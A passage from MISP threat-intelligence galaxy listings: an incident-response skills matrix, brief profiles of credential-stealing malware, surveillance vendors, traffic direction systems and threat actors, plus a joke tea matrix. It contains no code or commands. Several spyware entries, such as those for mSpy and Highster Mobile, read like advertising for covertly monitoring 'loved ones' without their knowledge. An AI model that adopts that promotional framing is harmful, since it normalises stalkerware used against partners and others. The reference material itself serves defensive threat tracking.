Preventing and containing IT incidents from a technical point of view - CSIRT - [R]

Technical skills pertaining to system administration, network administration, technical support or intrusion detection

Preventing and containing IT incidents from a technical point of view - CSIRT - [C]

Technical skills pertaining to system administration, network administration, technical support or intrusion detection

Preventing and containing IT incidents from a technical point of view - CSIRT - [I]

Technical skills pertaining to system administration, network administration, technical support or intrusion detection

Preventing and containing IT incidents from a technical point of view - CSIRT - [S]

Technical skills pertaining to system administration, network administration, technical support or intrusion detection
intrusion detection

The tag is: misp-galaxy:sod-matrix="Preventing and containing IT incidents from a technical point of view - CSIRT - [S]"

Analysis and interpretation of collected evidence - LEA - [R]
Criminalistics, digital forensics, admissible evidence

The tag is: misp-galaxy:sod-matrix="Analysis and interpretation of collected evidence - LEA - [R]"

Analysis and interpretation of collected evidence - LEA - [C]
Criminalistics, digital forensics, admissible evidence

The tag is: misp-galaxy:sod-matrix="Analysis and interpretation of collected evidence - LEA - [C]"

Analysis and interpretation of collected evidence - LEA - [I]
Criminalistics, digital forensics, admissible evidence

The tag is: misp-galaxy:sod-matrix="Analysis and interpretation of collected evidence - LEA - [I]"

Analysis and interpretation of collected evidence - LEA - [S]
Criminalistics, digital forensics, admissible evidence

The tag is: misp-galaxy:sod-matrix="Analysis and interpretation of collected evidence - LEA - [S]"

Analysis and interpretation of collected evidence - Judiciary - [R]
Criminalistics, digital forensics, admissible evidence

The tag is: misp-galaxy:sod-matrix="Analysis and interpretation of collected evidence - Judiciary - [R]"

Analysis and interpretation of collected evidence - Judiciary - [C]
Criminalistics, digital forensics, admissible evidence
Analysis and interpretation of collected evidence - Judiciary - [I]
Criminalistics, digital forensics, admissible evidence

The tag is: misp-galaxy:sod-matrix="Analysis and interpretation of collected evidence - Judiciary - [I]"

Analysis and interpretation of collected evidence - Judiciary - [S]
Criminalistics, digital forensics, admissible evidence

The tag is: misp-galaxy:sod-matrix="Analysis and interpretation of collected evidence - Judiciary - [S]"

Analysis and interpretation of collected evidence - Prosecutors - [R]
Criminalistics, digital forensics, admissible evidence

The tag is: misp-galaxy:sod-matrix="Analysis and interpretation of collected evidence - Prosecutors - [R]"

Analysis and interpretation of collected evidence - Prosecutors - [C]
Criminalistics, digital forensics, admissible evidence

The tag is: misp-galaxy:sod-matrix="Analysis and interpretation of collected evidence - Prosecutors - [C]"

Analysis and interpretation of collected evidence - Prosecutors - [I]
Criminalistics, digital forensics, admissible evidence

The tag is: misp-galaxy:sod-matrix="Analysis and interpretation of collected evidence - Prosecutors - [I]"
Analysis and interpretation of collected evidence - Prosecutors - [S]

Criminalistics, digital forensics, admissible evidence

The tag is: `misp-galaxy:sod-matrix="Analysis and interpretation of collected evidence - Prosecutors - [S]"`

Requesting testimonies from CSIRTs and LE - Judiciary - [R]

Testimonies in a criminal trial

The tag is: `misp-galaxy:sod-matrix="Requesting testimonies from CSIRTs and LE - Judiciary - [R]"`

Requesting testimonies from CSIRTs and LE - Judiciary - [C]

Testimonies in a criminal trial

The tag is: `misp-galaxy:sod-matrix="Requesting testimonies from CSIRTs and LE - Judiciary - [C]"`

Requesting testimonies from CSIRTs and LE - Judiciary - [I]

Testimonies in a criminal trial

The tag is: `misp-galaxy:sod-matrix="Requesting testimonies from CSIRTs and LE - Judiciary - [I]"`

Requesting testimonies from CSIRTs and LE - Judiciary - [S]

Testimonies in a criminal trial

The tag is: `misp-galaxy:sod-matrix="Requesting testimonies from CSIRTs and LE - Judiciary - [S]"`

Requesting testimonies from CSIRTs and LE - Prosecutors - [R]

Testimonies in a criminal trial

The tag is: `misp-galaxy:sod-matrix="Requesting testimonies from CSIRTs and LE - Prosecutors - [R]"`
Requesting testimonies from CSIRTs and LE - Prosecutors - [C]
Testimonies in a criminal trial
The tag is: misp-galaxy:sod-matrix="Requesting testimonies from CSIRTs and LE - Prosecutors - [C]"

Requesting testimonies from CSIRTs and LE - Prosecutors - [I]
Testimonies in a criminal trial
The tag is: misp-galaxy:sod-matrix="Requesting testimonies from CSIRTs and LE - Prosecutors - [I]"

Requesting testimonies from CSIRTs and LE - Prosecutors - [S]
Testimonies in a criminal trial
The tag is: misp-galaxy:sod-matrix="Requesting testimonies from CSIRTs and LE - Prosecutors - [S]"

Admitting and assessing the evidence - Judiciary - [R]
Evidence in a criminal trial
The tag is: misp-galaxy:sod-matrix="Admitting and assessing the evidence - Judiciary - [R]"

Admitting and assessing the evidence - Judiciary - [C]
Evidence in a criminal trial
The tag is: misp-galaxy:sod-matrix="Admitting and assessing the evidence - Judiciary - [C]"

Admitting and assessing the evidence - Judiciary - [I]
Evidence in a criminal trial
The tag is: misp-galaxy:sod-matrix="Admitting and assessing the evidence - Judiciary - [I]"

Admitting and assessing the evidence - Judiciary - [S]
Evidence in a criminal trial
The tag is: misp-galaxy:sod-matrix="Admitting and assessing the evidence - Judiciary - [S]"
Admitting and assessing the evidence - Prosecutors - [R]
Evidence in a criminal trial
The tag is: misp-galaxy:sod-matrix="Admitting and assessing the evidence - Prosecutors - [R]"

Admitting and assessing the evidence - Prosecutors - [C]
Evidence in a criminal trial
The tag is: misp-galaxy:sod-matrix="Admitting and assessing the evidence - Prosecutors - [C]"

Admitting and assessing the evidence - Prosecutors - [I]
Evidence in a criminal trial
The tag is: misp-galaxy:sod-matrix="Admitting and assessing the evidence - Prosecutors - [I]"

Admitting and assessing the evidence - Prosecutors - [S]
Evidence in a criminal trial
The tag is: misp-galaxy:sod-matrix="Admitting and assessing the evidence - Prosecutors - [S]"

Judging who committed a crime - Judiciary - [R]
Technical knowledge and knowledge of the legal framework
The tag is: misp-galaxy:sod-matrix="Judging who committed a crime - Judiciary - [R]"

Judging who committed a crime - Judiciary - [C]
Technical knowledge and knowledge of the legal framework
The tag is: misp-galaxy:sod-matrix="Judging who committed a crime - Judiciary - [C]"

Judging who committed a crime - Judiciary - [I]
Technical knowledge and knowledge of the legal framework
The tag is: misp-galaxy:sod-matrix="Judging who committed a crime - Judiciary - [I]"
Judging who committed a crime - Judiciary - [S]
Technical knowledge and knowledge of the legal framework
The tag is: misp-galaxy:sod-matrix="Judging who committed a crime - Judiciary - [S]"

Assessing incident damage and cost - CSIRT - [R]
Evaluation skills
The tag is: misp-galaxy:sod-matrix="Assessing incident damage and cost - CSIRT - [R]"

Assessing incident damage and cost - CSIRT - [C]
Evaluation skills
The tag is: misp-galaxy:sod-matrix="Assessing incident damage and cost - CSIRT - [C]"

Assessing incident damage and cost - CSIRT - [I]
Evaluation skills
The tag is: misp-galaxy:sod-matrix="Assessing incident damage and cost - CSIRT - [I]"

Assessing incident damage and cost - CSIRT - [S]
Evaluation skills
The tag is: misp-galaxy:sod-matrix="Assessing incident damage and cost - CSIRT - [S]"

Assessing incident damage and cost - LEA - [R]
Evaluation skills
The tag is: misp-galaxy:sod-matrix="Assessing incident damage and cost - LEA - [R]"

Assessing incident damage and cost - LEA - [C]
Evaluation skills
The tag is: misp-galaxy:sod-matrix="Assessing incident damage and cost - LEA - [C]"

Assessing incident damage and cost - LEA - [I]
Evaluation skills
The tag is: misp-galaxy:sod-matrix="Assessing incident damage and cost - LEA - [I]"
Assessing incident damage and cost - LEA - [S]
Evaluation skills
The tag is: misp-galaxy:sod-matrix="Assessing incident damage and cost - LEA - [S]"

Assessing incident damage and cost - Judiciary - [R]
Evaluation skills
The tag is: misp-galaxy:sod-matrix="Assessing incident damage and cost - Judiciary - [R]"

Assessing incident damage and cost - Judiciary - [C]
Evaluation skills
The tag is: misp-galaxy:sod-matrix="Assessing incident damage and cost - Judiciary - [C]"

Assessing incident damage and cost - Judiciary - [I]
Evaluation skills
The tag is: misp-galaxy:sod-matrix="Assessing incident damage and cost - Judiciary - [I]"

Assessing incident damage and cost - Judiciary - [S]
Evaluation skills
The tag is: misp-galaxy:sod-matrix="Assessing incident damage and cost - Judiciary - [S]"

Assessing incident damage and cost - Prosecutors - [R]
Evaluation skills
The tag is: misp-galaxy:sod-matrix="Assessing incident damage and cost - Prosecutors - [R]"

Assessing incident damage and cost - Prosecutors - [C]
Evaluation skills
The tag is: misp-galaxy:sod-matrix="Assessing incident damage and cost - Prosecutors - [C]"

Assessing incident damage and cost - Prosecutors - [I]
Evaluation skills
The tag is: misp-galaxy:sod-matrix="Assessing incident damage and cost - Prosecutors - [I]"
Assessing incident damage and cost - Prosecutors - [S]

Evaluation skills

The tag is: misp-galaxy:sod-matrix="Assessing incident damage and cost - Prosecutors - [S]"

Reviewing the response and update policies and procedures - CSIRT - [R]

Knowledge how to draft an incident response and procedures

The tag is: misp-galaxy:sod-matrix="Reviewing the response and update policies and procedures - CSIRT - [R]"

Reviewing the response and update policies and procedures - CSIRT - [C]

Knowledge how to draft an incident response and procedures

The tag is: misp-galaxy:sod-matrix="Reviewing the response and update policies and procedures - CSIRT - [C]"

Reviewing the response and update policies and procedures - CSIRT - [I]

Knowledge how to draft an incident response and procedures

The tag is: misp-galaxy:sod-matrix="Reviewing the response and update policies and procedures - CSIRT - [I]"

Reviewing the response and update policies and procedures - CSIRT - [S]

Knowledge how to draft an incident response and procedures

The tag is: misp-galaxy:sod-matrix="Reviewing the response and update policies and procedures - CSIRT - [S]"

Stealer

A list of malware stealer...

Stealer is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.
Nocturnal Stealer

It is designed to steal data found within multiple Chromium and Firefox based browsers, it can also steal many popular cryptocurrency wallets as well as any saved FTP passwords within FileZilla. Nocturnal Stealer uses several anti-VM and anti-analysis techniques, which include but are not limited to: environment fingerprinting, checking for debuggers and analyzers, searching for known virtual machine registry keys, and checking for emulation software.

The tag is: misp-galaxy:stealer="Nocturnal Stealer"

Nocturnal Stealer has relationships with:

- similar: misp-galaxy:malpedia="Nocturnal Stealer" with estimative-language:likelihood-probability="likely"

Table 5874. Table References

<table>
<thead>
<tr>
<th>Links</th>
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</thead>
</table>

TeleGrab

The first version stole browser credentials and cookies, along with all text files it can find on the system. The second variant added the ability to collect Telegram’s desktop cache and key files, as well as login information for the video game storefront Steam.

The tag is: misp-galaxy:stealer="TeleGrab"

Table 5875. Table References

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://blog.talosintelligence.com/2018/05/telegrab.html">https://blog.talosintelligence.com/2018/05/telegrab.html</a></td>
</tr>
</tbody>
</table>

AZORult

It is able to steal accounts from different software, such as, Firefox password Internet Explorer/Edge Thunderbird Chrome/Chromium and many more. It is also able to (1) list all installed software, (2) list processes, (3) Get information about the machine name (CPU type, Graphic card, size of memory), (4) take screen captures, (5) Steal cryptomoney wallet from Electrum, MultiBit, monero-project, bitcoin-qt.
The tag is: `misp-galaxy:stealer="AZORult"

Table 5876. Table References

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://malware.lu/articles/2018/05/04/azorult-stealer.html">https://malware.lu/articles/2018/05/04/azorult-stealer.html</a></td>
</tr>
</tbody>
</table>

**Vidar**

Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.

The tag is: `misp-galaxy:stealer="Vidar"

Table 5877. Table References

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar">https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar</a></td>
</tr>
</tbody>
</table>

**Ave Maria**

Information stealer which uses AutoIT for wrapping.

The tag is: `misp-galaxy:stealer="Ave Maria"

Table 5878. Table References

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://blog.yoroi.company/research/the-ave_maria-malware/">https://blog.yoroi.company/research/the-ave_maria-malware/</a></td>
</tr>
</tbody>
</table>

**HackBoss**

A cryptocurrency-stealing malware distributed through Telegram

The tag is: `misp-galaxy:stealer="HackBoss"

Table 5879. Table References

<table>
<thead>
<tr>
<th>Links</th>
</tr>
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<tbody>
<tr>
<td><a href="https://decoded.avast.io/romanalinkeova/hackboss-a-cryptocurrency-stealing-malware-distributed-through-telegram/">https://decoded.avast.io/romanalinkeova/hackboss-a-cryptocurrency-stealing-malware-distributed-through-telegram/</a></td>
</tr>
<tr>
<td><a href="https://github.com/avast/ioc/tree/master/HackBoss">https://github.com/avast/ioc/tree/master/HackBoss</a></td>
</tr>
</tbody>
</table>
Surveillance Vendor

List of vendors selling surveillance technologies including malware, interception devices or computer exploitation services.

Surveillance Vendor is a cluster galaxy available in JSON format at [this location](#). The JSON format can be freely reused in your application or automatically enabled in MISP.

authors

Various

Kape Technologies

Kape Technologies is better known by the name under which they were formerly incorporated - “Crossrider” but make no mistake they are the same company which became notorious as an adware/malware producer. Kape Technologies was originally known as Crossrider until the name change in 2018. The reason for that was, as CEO Ido Erlichman put it, “strong association to the past activities of the company.” Perhaps that refers to infecting users’ devices with malware and adware, considered “high-risk” by Symantec and Malwarebytes. If that wasn’t enough, Crossrider’s Founder and first CEO Koby Menachemi, was part of Unit 8200 – something that can be called Israel’s NSA. Another key person, Teddy Sagi, who is the main investor in both Crossrider and Kape Technologies, is mentioned in the Panama Papers.

The tag is: `misp-galaxy:surveillance-vendor="Kape Technologies"`

Kape Technologies is also known as:

- Kape
- Crossrider

Table 5880. Table References

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NSO group

NSO Group Technologies is an Israeli technology firm known for its Pegasus spyware enabling the remote surveillance of smartphones. It was founded in 2010 by Niv Carmi, Omri Lavie, and Shalev Hulio. It reportedly employed almost 500 people as of 2017, and is based in Herzliya, near Tel Aviv.

The tag is: `misp-galaxy:surveillance-vendor="NSO group"`

Table 5881. Table References

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Hacking Team

Hacking Team is a Milan-based information technology company that sells offensive intrusion and surveillance capabilities to governments, law enforcement agencies and corporations. Its "Remote Control Systems" enable governments and corporations to monitor the communications of internet users, decipher their encrypted files and emails, record Skype and other Voice over IP communications, and remotely activate microphones and camera on target computers. The company has been criticized for providing these capabilities to governments with poor human rights records, though Hacking Team states that they have the ability to disable their software if it is used unethically. The Italian government has restricted their license to do business with countries outside Europe. Hacking Team employs around 40 people in its Italian office, and has subsidiary branches in Annapolis, Washington, D.C., and Singapore. Its products are in use in dozens of countries across six continents.

The tag is: `misp-galaxy:surveillance-vendor="Hacking Team"`

Hacking Team is also known as:

- Memento Labs

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Gamma Group

Gamma Group is an Anglo-German technology company that sells surveillance software to governments and police forces around the world. The company has been strongly criticised by human rights organisations for selling its FinFisher software to undemocratic regimes such as Egypt and Bahrain.

The tag is: `misp-galaxy:surveillance-vendor="Gamma Group"`

Gamma Group is also known as:

- Gamma International

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FlexiSPY

Flexispy is an application that can be considered as a trojan, based on Symbian. The program sends
all information received and sent from the smartphone to a Flexispy server. It was originally created to protect children and spy on adulterous spouses.

The tag is: *misp-galaxy:surveillance-vendor="FlexiSPY"*

**mSpy**

mSpy is probably the most popular monitoring software on the market today. It is designed for parents who want to track their children’s online activity. Using mSpy is easy — just download and install a hidden app on your child's phone and let it do its thing in the background. mSpy is available for iOS and Android, and has a web-based control panel that allows you to remotely monitor activity on your child’s device, including texts, instant messages, phone calls and social media use on Snapchat or Facebook. It also allows you to track the location of your child’s device on a map. The best thing about mSpy is that it works on non-jailbroken iPhones. Do note that some of its features, including email tracking and instant messenger monitoring, are only available on a rooted Android smartphone. If you don’t know how to root an Android device, you might want to consider using a spy app like Highster Mobile. This app lets you spy on Android phone without rooting.

The tag is: *misp-galaxy:surveillance-vendor="mSpy"*

### Table 5884. Table References

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**Highster Mobile**

Highster Mobile is a cell phone spy and monitoring software that allows you to secretly monitor your children, employees, or loved ones without them ever knowing it. The app is available for both Android and iOS devices and is developed by ILF Mobile Apps, a company based in Bohemia, New York, that specializes in mobile security.

The tag is: *misp-galaxy:surveillance-vendor="Highster Mobile"*

### Table 5885. Table References

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**Mobile Spy**

Mobile Spy is a cell phone monitoring application for iOS, Android and BlackBerry developed by Retina-X Studios. It allows you to monitor the smartphone activity of your children. You’ll be able to see text messages, track GPS locations, monitor social media activities, view call details and more inside a secure online account. Monitoring made easy. Login anytime you wish from any location to see the recorded data without needing access to the monitored phone. The hidden version of Mobile Spy is no longer available due to legal issues.
Hoverwatch

Hoverwatch is a computer and mobile monitoring software developed by Refog. It is available for Android, Windows and macOS. It runs silently in the background, recording all activities performed by the user such as messages sent and received, phone calls made and received, web sites visited, and every keystroke typed. All recorded data is sent to an online account.

MobiStealth

MobiStealth is a popular spy software that comes with a simple web-based console and powerful monitoring features. It is developed by Infoweise Pty Ltd, a private company headquartered in Sydney, Australia. They have been making high quality monitoring solutions since 2009. In November 2015, they launched a “Non-Jailbreak” feature, letting users spy on all iOS devices without needing to jailbreak them. Just like many other spy software, MobiStealth allows you to spy on a cell phone or computer via a web interface called StealthClub. As its name implies, it is a stealth application that runs in the background without the owner’s knowledge.

Spyera

Spyera develops and sells computer and mobile spy software. Based in Hong Kong, Spyera’s products work in all languages and all countries. The company’s phone and PC monitoring products are useful tools for any parent or company, although they are quite expensive in comparison to other products. Spyera comes in three different versions — a mobile version for iPhone and Android smartphones, a tablet version for iPad and Android tablets, and a desktop version for Mac and Windows. The mobile version of Spyera is actually very similar to the FlexiSPY Extreme, which I reviewed a few weeks ago. It has everything you’d expect from a cell phone spy software: live call listening, call recording, and location tracking.
StealthGenie

StealthGenie is a powerful cell phone spy software created by InvoCode Ltd in 2010 that can be used to spy on cheating spouses and monitor children's activities. In September 2014, Hammad Akbar, founder of StealthGenie, was arrested in Los Angeles and charged with selling mobile device spyware. StealthGenie was officially discontinued on 26 September 2014.

SpyBubble

SpyBubble is a spy app that lets you secretly spy on someone's phone. This spy app is compatible with a variety of mobile devices, including iPhone, Android, BlackBerry and Symbian, and it offers logging features for most cell phone activity. SpyBubble doesn't provide the blocking and restricting features that you will find in several similar applications. However, it has many useful features, and its monitoring features are excellent. Spybubble cell phone spy software was discontinued due to legal reasons.

Target Information

Description of targets of threat actors..

Target Information is a cluster galaxy available in JSON format at this location. The JSON format can be freely reused in your application or automatically enabled in MISP.

authors

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• US
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The tag is: misp-galaxy:target-information="Zimbabwe"
TDS

TDS is a list of Traffic Direction System used by adversaries.

TDS is a cluster galaxy available in JSON format at this location. The JSON format can be freely reused in your application or automatically enabled in MISP.

authors

Kafeine

Keitaro

Keitaro TDS is among the mostly used TDS in drive by infection chains

The tag is: misp-galaxy:tds="Keitaro"

Table 5892. Table References

<table>
<thead>
<tr>
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<tbody>
<tr>
<td><a href="https://keitarotds.com/">https://keitarotds.com/</a></td>
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</table>

BlackTDS

BlackTDS is mutualised TDS advertised underground since end of December 2017

The tag is: misp-galaxy:tds="BlackTDS"

Table 5893. Table References

<table>
<thead>
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<tbody>
<tr>
<td>.com/[<a href="https://blacktds.com/">https://blacktds.com/</a></td>
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</table>

ShadowTDS

ShadowTDS is advertised underground since 2016-02. It’s in fact more like a Social Engineering kit focused on Android and embedding a TDS

The tag is: misp-galaxy:tds="ShadowTDS"

Sutra

Sutra TDS was dominant from 2012 till 2015

The tag is: misp-galaxy:tds="Sutra"

Table 5894. Table References

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<td>3460</td>
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SimpleTDS

SimpleTDS is a basic open source TDS

The tag is: `misp-galaxy:tds="SimpleTDS"`

SimpleTDS is also known as:

- Stds

Table 5895. Table References

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<thead>
<tr>
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<tbody>
<tr>
<td><a href="https://sourceforge.net/projects/simpletds/">https://sourceforge.net/projects/simpletds/</a></td>
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</table>

zTDS

zTDS is an open source TDS

The tag is: `misp-galaxy:tds="zTDS"`

Table 5896. Table References

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<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="http://ztds.info/doku.php">http://ztds.info/doku.php</a></td>
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</table>

BossTDS

BossTDS

The tag is: `misp-galaxy:tds="BossTDS"`

Table 5897. Table References

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<tr>
<td><a href="http://bosstds.com/">http://bosstds.com/</a></td>
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BlackHat TDS

BlackHat TDS is sold underground.

The tag is: `misp-galaxy:tds="BlackHat TDS"`

Table 5898. Table References

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</table>
Futuristic TDS

Futuristic TDS is the TDS component of BlackOS/CookieBomb/NorthTale Iframer

The tag is: misp-galaxy:tds="Futuristic TDS"

Orchid TDS

Orchid TDS was sold underground. Rare usage

The tag is: misp-galaxy:tds="Orchid TDS"

Tea Matrix

Tea Matrix.

Tea Matrix is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.

authors

Alexandre Dulaunoy

Multi infusion

Multi infusion is allow and recommended

The tag is: misp-galaxy:tea-matrix="Multi infusion"

Single infusion

Single infusion is recommended

The tag is: misp-galaxy:tea-matrix="Single infusion"

Water temp 90-95 degC

Water temperature 90-95 degC

The tag is: misp-galaxy:tea-matrix="Water temp 90-95 degC"

Water temp 80 degC

Water temperature 80 degC
Brewing time 2-3 min
Brewing time 2-3 minutes

Brewing time 3-4 min
Brewing time 3-4 minutes

Milk in tea
Milk in tea

Threat Actor
Known or estimated adversary groups targeting organizations and employees. Adversary groups are regularly confused with their initial operation or campaign. threat-actor-classification meta can be used to clarify the understanding of the threat-actor if also considered as operation, campaign or activity group.

Threat Actor is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.

authors
Alexandre Dulaunoy - Florian Roth - Thomas Schreck - Timo Steffens - Various

Comment Crew
PLA Unit 61398 (Chinese: 61398部队, Pinyin: 61398 bùduì) is the Military Unit Cover Designator (MUCD)[1] of a People's Liberation Army advanced persistent threat unit that has been alleged to be a source of Chinese computer hacking attacks

Comment Crew is also known as:

• Comment Panda
• PLA Unit 61398
• APT 1
• APT1
• Advanced Persistent Threat 1
• Byzantine Candor
• Group 3
• TG-8223
• Comment Group
• Brown Fox
• GIF89a
• ShadyRAT
• Shanghai Group

Comment Crew has relationships with:

• similar: misp-galaxy:mitre-intrusion-set="APT1 - G0006" with estimative-language:likelihood-probability="likely"

Table 5899. Table References

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<tr>
<td><a href="https://en.wikipedia.org/wiki/PLA_Unit_61398">https://en.wikipedia.org/wiki/PLA_Unit_61398</a></td>
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<td><a href="https://www.cfr.org/interactive/cyber-operations/pla-unit-61398">https://www.cfr.org/interactive/cyber-operations/pla-unit-61398</a></td>
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<td><a href="https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf">https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf</a></td>
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<td><a href="https://www.fireeye.com/blog/threat-research/2014/03/a-detailed-examination-of-the-siesta-campaign.html">https://www.fireeye.com/blog/threat-research/2014/03/a-detailed-examination-of-the-siesta-campaign.html</a></td>
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<td><a href="https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/operation-oceansalt-delivers-wave-after-wave/">https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/operation-oceansalt-delivers-wave-after-wave/</a></td>
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<td><a href="https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=f1265df5-6e5e-4fcc-9828-d4d4dbaf3d7&amp;CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&amp;tab=librarydocuments">https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=f1265df5-6e5e-4fcc-9828-d4d4dbaf3d7&amp;CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&amp;tab=librarydocuments</a></td>
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<tr>
<td><a href="https://attack.mitre.org/groups/G0006/">https://attack.mitre.org/groups/G0006/</a></td>
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**Nitro**

These attackers were the subject of an extensive report by Symantec in 2011, which termed the attackers Nitro and stated: 'The goal of the attackers appears to be to collect intellectual property such as design documents, formulas, and manufacturing processes. In addition, the same attackers
appear to have a lengthy operation history including attacks on other industries and organizations. Attacks on the chemical industry are merely their latest attack wave. As part of our investigations, we were also able to identify and contact one of the attackers to try and gain insights into the motivations behind these attacks.' Palo Alto Networks reported on continued activity by the attackers in 2014.

The tag is: `misp-galaxy:threat-actor="Nitro"

Nitro is also known as:

- Covert Grove

Table 5900. Table References

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<tr>
<td><a href="https://unit42.paloaltonetworks.com/new-indicators-compromise-apt-group-nitro-uncovered/">https://unit42.paloaltonetworks.com/new-indicators-compromise-apt-group-nitro-uncovered/</a></td>
</tr>
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</table>

**Codoso**

The New York Times described Codoso as: 'A collection of hackers for hire that the security industry has been tracking for years. Over the years, the group has breached banks, law firms and tech companies, and once hijacked the Forbes website to try to infect visitors’ computers with malware.'

The tag is: `misp-galaxy:threat-actor="Codoso"

Codoso is also known as:

- C0d0so
- APT19
- APT 19
- Sunshop Group

Codoso has relationships with:

- similar: `misp-galaxy:threat-actor="Shell Crew"` with estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:threat-actor="Hurricane Panda"` with estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:mitre-intrusion-set="Deep Panda - G0009"` with estimative-language:likelihood-probability="likely"

Table 5901. Table References

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Dust Storm

The tag is: `misp-galaxy:threat-actor="Dust Storm"`

Dust Storm has relationships with:

- similar: `misp-galaxy:mitre-intrusion-set="Dust Storm - G0031"` with estimative-language:likelihood-probability="likely"

Table 5902. Table References

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<tr>
<td><a href="https://attack.mitre.org/groups/G0031/">https://attack.mitre.org/groups/G0031/</a></td>
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Keyhole Panda

The tag is: `misp-galaxy:threat-actor="Keyhole Panda"`

Keyhole Panda is also known as:

- temp.bottle

Wet Panda

The tag is: `misp-galaxy:threat-actor="Wet Panda"

Table 5903. Table References

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Foxy Panda

Adversary group targeting telecommunication and technology organizations.

The tag is: `misp-galaxy:threat-actor="Foxy Panda"

Table 5904. Table References
Predator Panda

The tag is: `misp-galaxy:threat-actor="Predator Panda"`

Table 5905. Table References

Links

http://go.crowdstrike.com/rs/281-OBQ-266/images/ReportGlobalThreatIntelligence.pdf

Union Panda

The tag is: `misp-galaxy:threat-actor="Union Panda"`

Table 5906. Table References

Links


Spicy Panda

The tag is: `misp-galaxy:threat-actor="Spicy Panda"`

Table 5907. Table References

Links

http://go.crowdstrike.com/rs/281-OBQ-266/images/ReportGlobalThreatIntelligence.pdf

Eloquent Panda

The tag is: `misp-galaxy:threat-actor="Eloquent Panda"`

Table 5908. Table References

Links


Dizzy Panda

The tag is: `misp-galaxy:threat-actor="Dizzy Panda"`

Dizzy Panda is also known as:
Putter Panda

Putter Panda were the subject of an extensive report by CrowdStrike, which stated: 'The CrowdStrike Intelligence team has been tracking this particular unit since 2012, under the codename PUTTER PANDA, and has documented activity dating back to 2007. The report identifies Chen Ping, aka cpyy, and the primary location of Unit 61486.'

The tag is: misp-galaxy:threat-actor="Putter Panda"

Putter Panda is also known as:

- PLA Unit 61486
- APT 2
- APT2
- Group 36
- APT-2
- MSUpdater
- 4H Crew
- SULPHUR
- SearchFire
- TG-6952

Putter Panda has relationships with:


Table 5909. Table References

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<tbody>
<tr>
<td><a href="http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf">http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf</a></td>
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<tr>
<td><a href="https://www.cfr.org/interactive/cyber-operations/putter-panda">https://www.cfr.org/interactive/cyber-operations/putter-panda</a></td>
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<tr>
<td><a href="https://attack.mitre.org/groups/G0024/">https://attack.mitre.org/groups/G0024/</a></td>
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UPS

Symantec described UPS in 2016 report as: 'Buckeye (also known as APT3, Gothic Panda, UPS Team, and TG-0110) is a cyberespionage group that is believed to have been operating for well over half a decade. Traditionally, the group attacked organizations in the US as well as other targets. However, Buckeyeyes focus appears to have changed as of June 2015, when the group began compromising political entities in Hong Kong.'
The tag is: `misp-galaxy:threat-actor="UPS"`

UPS is also known as:

- Gothic Panda
- TG-0110
- APT 3
- Group 6
- UPS Team
- APT3
- Buckeye
- Boyusec
- BORON
- BRONZE MAYFAIR

UPS has relationships with:

- similar: `misp-galaxy:mitre-intrusion-set="APT3 - G0022"` with estimative-language:likelihood-probability="likely"

**Table 5910. Table References**

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<tr>
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<tr>
<td><a href="https://www.fireeye.com/blog/threat-research/2015/06/operation-clandestine-wolf-adobe-flash-zero-day.html">https://www.fireeye.com/blog/threat-research/2015/06/operation-clandestine-wolf-adobe-flash-zero-day.html</a></td>
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<tr>
<td><a href="https://www.cfr.org/interactive/cyber-operations/apt-3">https://www.cfr.org/interactive/cyber-operations/apt-3</a></td>
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<tr>
<td><a href="https://www.secureworks.com/research/threat-profiles/bronze-mayfair">https://www.secureworks.com/research/threat-profiles/bronze-mayfair</a></td>
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</table>

**DarkHotel**

Kaspersky described DarkHotel in a 2014 report as: '... DarkHotel drives its campaigns by spear-phishing targets with highly advanced Flash zero-day exploits that effectively evade the latest Windows and Adobe defenses, and yet they also imprecisely spread among large numbers of vague targets with peer-to-peer spreading tactics. Moreover, this crews most unusual characteristic is that for several years the Darkhotel APT has maintained a capability to use hotel networks to follow and hit selected targets as they travel around the world.'

The tag is: `misp-galaxy:threat-actor="DarkHotel"`

DarkHotel is also known as:

- DUBNIUM
DarkHotel has relationships with:

- similar: misp-galaxy:microsoft-activity-group="DUBNIUM" with estimative-language:likelihood-probability="likely"

Table 5911. Table References

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<tbody>
<tr>
<td><a href="https://securelist.com/blog/research/66779/the-darkhotel-apt/">https://securelist.com/blog/research/66779/the-darkhotel-apt/</a></td>
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<td><a href="https://securelist.com/the-darkhotel-apt/66779/">https://securelist.com/the-darkhotel-apt/66779/</a></td>
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<tr>
<td><a href="https://www.cfr.org/interactive/cyber-operations/darkhotel">https://www.cfr.org/interactive/cyber-operations/darkhotel</a></td>
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<td><a href="https://attack.mitre.org/groups/G0012/">https://attack.mitre.org/groups/G0012/</a></td>
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<tr>
<td><a href="https://www.secureworks.com/research/threat-profiles/tungsten-bridge">https://www.secureworks.com/research/threat-profiles/tungsten-bridge</a></td>
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</table>

**IXESHE**

A group of China-based attackers, who conducted a number of spear phishing attacks in 2013.

The tag is: misp-galaxy:threat-actor="IXESHE"

